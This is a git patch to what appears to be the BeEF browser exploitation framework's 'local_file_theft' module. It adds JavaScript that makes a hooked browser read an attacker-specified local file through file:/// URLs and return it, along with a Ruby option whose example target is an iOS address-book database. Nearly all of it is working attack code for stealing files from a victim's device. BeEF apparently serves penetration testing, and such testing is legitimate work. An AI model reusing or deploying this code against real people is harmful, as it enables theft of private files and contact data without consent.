From ad2bc95cf06df20b664d5acc8a41c597ea535ac1 Mon Sep 17 00:00:00 2001
From: Mike Haworth <mike@aurainfosec.com>
Date: Wed, 22 Aug 2012 20:50:03 +1200
Subject: [PATCH] updated local file theft to accept custom file path

---
 modules/misc/local_file_theft/command.js | 62 ++++++++++++++++++------
 modules/misc/local_file_theft/module.rb  | 10 ++++
 2 files changed, 57 insertions(+), 15 deletions(-)

diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js
index 148f79d8f..614cdc659 100644
--- a/modules/misc/local_file_theft/command.js
+++ b/modules/misc/local_file_theft/command.js
@@ -86,6 +86,16 @@ result = '';
 							    }
 			    }
 
+    fileList['custom']=  {
+				    // user defined
+				    "discover"	:'',
+
+				    "post" 		:{
+							    'result':'<%== @target_file %>',
+							    }
+			    }
+
+
     functionList = {
 			    mac:{
 				    // OS X disovery
@@ -138,11 +148,25 @@ result = '';
 											    grabFiles(homedir,"ios")
 										    }
 									    }
-
-					    alert("ipad")
+                                        return true;
 					    }
 				    },
 
+                custom:{
+                // Grab custom stuff
+                    discover : function(){
+                                        tmp = new XMLHttpRequest()
+                                        tmp.open('get',fileList['custom']['discover'])
+                                        tmp.send()
+                                        tmp.onreadystatechange=function(){
+                                            if(tmp.readyState==4){
+                                                homedir = "file:///";
+                                                grabFiles(homedir,"custom")
+                                            }
+                                        }
+                                        return true;
+                        }
+                    },
 			    android:{
 			    // figure out what app (gmail, browser, or dolphin?) android 
 				    discover : function(){
@@ -172,19 +196,27 @@ result = '';
 
 
     function identify(){
-	    if(/.*Android.*/.test(navigator.userAgent)){
-		    return "android"
-	    } else if(/Linux.*/i.test(navigator.platform)){
-		    return "linux"
-	    } else if(/iP.*/i.test(navigator.platform)){
-		    return "ios"
-	    } else if(/.*Mac.*/i.test(navigator.userAgent)){
-		    return "mac"
-	    } else if(/.*Windows.*/i.test(navigator.userAgent)){
-		    return "windows"
-	    } else if(/.*hpwOS.*/i.test(navigator.platform)){
-		    return "webos"
-	    }
+        
+        // custom file is specified
+        if ('<%== @target_file %>' != 'autodetect') {
+            return "custom"
+
+        // determine a good file to steal based on platform
+        } else {
+            if(/.*Android.*/.test(navigator.userAgent)){
+                return "android"
+            } else if(/Linux.*/i.test(navigator.platform)){
+                return "linux"
+            } else if(/iP.*/i.test(navigator.platform)){
+                return "ios"
+            } else if(/.*Mac.*/i.test(navigator.userAgent)){
+                return "mac"
+            } else if(/.*Windows.*/i.test(navigator.userAgent)){
+                return "windows"
+            } else if(/.*hpwOS.*/i.test(navigator.platform)){
+                return "webos"
+            }
+        }
     }
 
 
diff --git a/modules/misc/local_file_theft/module.rb b/modules/misc/local_file_theft/module.rb
index d75a3d236..20dd2a5a9 100644
--- a/modules/misc/local_file_theft/module.rb
+++ b/modules/misc/local_file_theft/module.rb
@@ -19,6 +19,16 @@
 
 class Local_file_theft < BeEF::Core::Command
 
+  def self.options
+    return [
+        {'name' => 'target_file', 
+         'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb', 
+         'ui_label' => 'Target file',
+         'value' => 'autodetect'
+         } 
+    ]
+  end
+ 
    def post_execute
     content = {}
     content['result'] = @datastore['result']